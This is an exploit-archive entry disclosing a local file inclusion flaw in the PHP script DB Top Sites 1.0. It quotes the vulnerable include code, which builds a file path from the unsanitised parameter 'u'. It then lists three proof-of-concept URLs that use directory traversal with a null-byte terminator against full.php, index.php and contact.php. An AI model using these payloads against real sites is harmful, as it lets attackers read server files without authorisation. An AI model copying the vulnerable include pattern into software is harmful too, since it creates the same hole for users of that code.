DB Top Sites 1.0 (index.php u) Local File Inclusion Vulnerability

2009-06-15T00:00:00
ID 1337DAY-ID-5371
Type zdt
Reporter SirGod
Modified 2009-06-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
DB Top Sites 1.0 (index.php u) Local File Inclusion Vulnerability
=================================================================


######################################################################
[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
[+] Discovered By SirGod 
#######################################################################

[+] Local File Inclusion

 - Vulnerable code is everywhere

-------------------------------------------------------------------------------------------------------
if ( $u != "" ) {

if ( file_exists( "./sites/session/$u.session.php" ) ){
include "./sites/session/$u.session.php";
include "./sites/$u.php";
-------------------------------------------------------------------------------------------------------

- PoC's

    http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00

    http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00

    http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00


#######################################################################



#  0day.today [2018-02-20]  #